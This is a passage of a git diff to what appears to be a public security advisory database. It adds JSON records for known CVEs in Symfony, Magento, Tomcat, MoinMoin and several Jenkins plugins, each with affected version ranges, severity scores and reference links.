"2.4.0" }, { "fixed": "2.6.12" @@ -53,7 +91,7 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/symfony" + "name": "symfony/form" }, "ranges": [ { @@ -68,6 +106,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] } ], "references": [ @@ -79,10 +231,30 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/16630" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/form/CVE-2015-8125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2015-8125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2015-8125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-8125.yaml" + }, { "type": "WEB", "url": "https://symfony.com/blog/cve-2015-8125-potential-remote-timing-attack-vulnerability-in-security-remember-me-service" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2015-8125" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200228050051/http://www.securityfocus.com/bid/77692" @@ -98,6 +270,10 @@ { "type": "WEB", "url": "http://www.debian.org/security/2015/dsa-3402" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/77692" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json b/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json index 693344f5f0ddc..30e7876793bd2 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json +++ b/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8110" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8110.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json b/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json index 0e9b03a12b7c6..273d92c78eefd 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json +++ b/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json @@ -78,6 +78,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7921" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7921.yaml" + }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051916/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23" diff --git a/advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json b/advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json new file mode 100644 index 0000000000000..d2e338d1578c9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json @@ -0,0 +1,209 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggx9-4728-588r", + "modified": "2024-02-08T21:29:22Z", + "published": "2022-05-02T03:37:48Z", + "aliases": [ + "CVE-2009-2693" + ], + "summary": "Apache Tomcat Directory Traversal vulnerability", + "details": "Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a `..` (dot dot) in an entry in a WAR file, as demonstrated by a `../../bin/catalina.bat` entry.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.5.0" + }, + { + "last_affected": "5.5.28" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "last_affected": "6.0.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2693" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55855" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/tomcat" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19355" + }, + { + "type": "WEB", + "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7017" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229071135/http://www.securityfocus.com/bid/37944" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200516121700/http://www.securityfocus.com/archive/1/516397/100/0/threaded" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20201206235536/http://www.securityfocus.com/archive/1/509148/100/0/threaded" + }, + { + "type": "WEB", + "url": "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02241113" + }, + { + "type": "WEB", + "url": "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-04/msg00001.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00089.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00090.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2013-01/msg00037.html" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=127420533226623&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=133469267822771&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=136485229118404&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=139344343412337&w=2" + }, + { + "type": "WEB", + "url": "http://support.apple.com/kb/HT4077" + }, + { + "type": "WEB", + "url": "http://svn.apache.org/viewvc?rev=892815&view=rev" + }, + { + "type": "WEB", + "url": "http://svn.apache.org/viewvc?rev=902650&view=rev" + }, + { + "type": "WEB", + "url": "http://tomcat.apache.org/security-5.html" + }, + { + "type": "WEB", + "url": "http://tomcat.apache.org/security-6.html" + }, + { + "type": "WEB", + "url": "http://ubuntu.com/usn/usn-899-1" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2011/dsa-2207" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:176" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:177" + }, + { + "type": "WEB", + "url": "http://www.redhat.com/support/errata/RHSA-2010-0119.html" + }, + { + "type": "WEB", + "url": "http://www.redhat.com/support/errata/RHSA-2010-0580.html" + }, + { + "type": "WEB", + "url": "http://www.redhat.com/support/errata/RHSA-2010-0582.html" + }, + { + "type": "WEB", + "url": "http://www.vmware.com/security/advisories/VMSA-2011-0003.html" + }, + { + "type": "WEB", + "url": "http://www.vmware.com/support/vsphere4/doc/vsp_vc41_u1_rel_notes.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:29:22Z", + "nvd_published_at": "2010-01-28T20:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json b/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json index 43f7833ca5dd1..65d3e657b4352 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json +++ b/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json @@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8139" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8139.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json b/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json index 5dc4732bfd1ae..49ba86915c362 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json +++ b/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json @@ -33,6 +33,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.5.4" + } + ] + } + ] } ], "references": [ @@ -40,6 +78,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6164" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2020-6164.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-cms" @@ -47,6 +89,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2020-6164" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2020-6164/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json b/advisories/github-reviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json new file mode 100644 index 0000000000000..40fee8e9567c8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gpmw-h4wq-4rch", + "modified": "2024-01-30T21:18:51Z", + "published": "2022-05-24T16:56:45Z", + "aliases": [ + "CVE-2019-10409" + ], + "summary": "Missing permission check in Jenkins Project Inheritance Plugin", + "details": "A missing permission check in Jenkins Project Inheritance Plugin 19.08.01 and earlier allowed attackers with Overall/Read permission to trigger project generation from templates.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins:project-inheritance" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.08.02" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10409" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-401" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:18:51Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json b/advisories/github-reviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json new file mode 100644 index 0000000000000..517a3865d4d42 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvhp-v4m2-3rwf", + "modified": "2024-01-30T21:09:20Z", + "published": "2022-05-13T01:15:02Z", + "aliases": [ + "CVE-2019-10277" + ], + "summary": "Jenkins StarTeam Plugin stores credentials in plain text ", + "details": "Jenkins StarTeam Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins:starteam" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.6.13" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10277" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1085" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:09:20Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json b/advisories/github-reviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json new file mode 100644 index 0000000000000..d31fd69c5bcd7 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gw8g-hh47-q4gw/GHSA-gw8g-hh47-q4gw.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gw8g-hh47-q4gw", + "modified": "2024-01-30T23:17:25Z", + "published": "2022-05-14T03:45:23Z", + "aliases": [ + "CVE-2017-1000389" + ], + "summary": "Cross-Site Request Forgery (CSRF) vulnerability in Jenkins global-build-stats plugin", + "details": "Some URLs provided by Jenkins global-build-stats plugin version 1.4 and earlier returned a JSON response that contained request parameters. These responses had the Content Type: text/html, so could have been interpreted as HTML by clients, resulting in a potential reflected cross-site scripting vulnerability. Additionally, some URLs provided by global-build-stats plugin that modify data did not require POST requests to be sent, resulting in a potential cross-site request forgery vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:global-build-stats" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.4" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000389" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-10-23/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:17:25Z", + "nvd_published_at": "2018-01-26T02:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json b/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json index 5a85be0ddf4c4..029d31006378a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json +++ b/advisories/github-reviewed/2022/05/GHSA-gwwq-54qp-9pgp/GHSA-gwwq-54qp-9pgp.json @@ -52,6 +52,14 @@ "type": "WEB", "url": "https://framework.zend.com/changelog/2.3.6" }, + { + "type": "WEB", + "url": "https://framework.zend.com/security/advisory/ZF2015-03" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/zendframework/zendframework/CVE-2015-1786.yaml" + }, { "type": "WEB", "url": "https://github.com/zendframework/zf-web/blob/f97fe5c3cf6c51df7502237c6342511802c8df22/module/Security/view/security/advisory/ZF2015-03.phtml" diff --git a/advisories/github-reviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json b/advisories/github-reviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json new file mode 100644 index 0000000000000..5b116b69c1a16 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gwxm-wqpq-w539/GHSA-gwxm-wqpq-w539.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwxm-wqpq-w539", + "modified": "2024-01-30T22:35:37Z", + "published": "2022-05-14T03:18:39Z", + "aliases": [ + "CVE-2018-1000176" + ], + "summary": "Jenkins Email Extension Plugin showed plain text SMTP password in configuration form field", + "details": "An exposure of sensitive information vulnerability exists in Jenkins Email Extension Plugin 2.61 and older in src/main/resources/hudson/plugins/emailext/ExtendedEmailPublisher/global.groovy and ExtendedEmailPublisherDescriptor.java that allows attackers with control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured SMTP password.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:email-ext" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.62" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.61" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000176" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-04-16/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:35:37Z", + "nvd_published_at": "2018-05-08T15:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json b/advisories/github-reviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json new file mode 100644 index 0000000000000..18e9d690bd177 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gxh5-r8gp-pjc3/GHSA-gxh5-r8gp-pjc3.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxh5-r8gp-pjc3", + "modified": "2024-02-08T15:42:32Z", + "published": "2022-05-17T05:49:23Z", + "aliases": [ + "CVE-2010-2970" + ], + "summary": "MoinMoin cross-site scripting (XSS) vulnerability ", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/SlideShow.py, (2) action/anywikidraw.py, and (3) action/language_setup.py, a similar issue to CVE-2010-2487.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Moin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.9.0" + }, + { + "fixed": "1.9.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2970" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moinwiki/moin" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140801154518/http://secunia.com/advisories/40836" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228150629/http://www.securityfocus.com/bid/40549" + }, + { + "type": "WEB", + "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=584809" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/raw-file/1.9.3/docs/CHANGES" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/rev/4fe9951788cb" + }, + { + "type": "WEB", + "url": "http://hg.moinmo.in/moin/1.9/rev/e50b087c4572" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127799369406968&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=127809682420259&w=2" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinBugs/1.9.2UnescapedInputForThemeAddMsg" + }, + { + "type": "WEB", + "url": "http://moinmo.in/MoinMoinRelease1.9" + }, + { + "type": "WEB", + "url": "http://moinmo.in/SecurityFixes" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2010/dsa-2083" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T15:42:32Z", + "nvd_published_at": "2010-08-05T13:22:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json b/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json index 4ab103558a6e5..e673017951e41 100644 --- a/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json +++ b/advisories/github-reviewed/2022/05/GHSA-h522-94xp-2xr6/GHSA-h522-94xp-2xr6.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7929" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7929.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-33" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121011306/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-33" diff --git a/advisories/github-reviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json b/advisories/github-reviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json new file mode 100644 index 0000000000000..ebd188bd67359 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-h5hm-73hg-frrm/GHSA-h5hm-73hg-frrm.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5hm-73hg-frrm", + "modified": "2024-01-30T22:11:46Z", + "published": "2022-05-14T02:56:39Z", + "aliases": [ + "CVE-2018-1999034" + ], + "summary": "Jenkins Inedo ProGet Plugin globally and unconditionally disabled SSL/TLS certificate validation", + "details": "A man in the middle vulnerability exists in Jenkins Inedo ProGet Plugin 0.8 and earlier in ProGetApi.java, ProGetConfig.java, ProGetConfiguration.java that allows attackers to impersonate any service that Jenkins connects to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.inedo.proget:inedo-proget" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.8" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999034" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-933" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:11:46Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json b/advisories/github-reviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json new file mode 100644 index 0000000000000..6648d7036f367 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-h7rx-r733-7x7r/GHSA-h7rx-r733-7x7r.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7rx-r733-7x7r", + "modified": "2024-01-30T22:44:02Z", + "published": "2022-05-13T01:40:57Z", + "aliases": [ + "CVE-2017-1000107" + ], + "summary": "Sandbox bypass in Jenkins Script Security Plugin sandbox bypass", + "details": "Script Security Plugin did not apply sandboxing restrictions to constructor invocations via positional arguments list, super constructor invocations, method references, and type coercion expressions. This could be used to invoke arbitrary constructors and methods, bypassing sandbox protection.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:script-security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.31" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.30" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000107" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:44:02Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json b/advisories/github-reviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json new file mode 100644 index 0000000000000..8c087fb1c19f6 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-hf4p-4j9r-3cvx/GHSA-hf4p-4j9r-3cvx.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hf4p-4j9r-3cvx", + 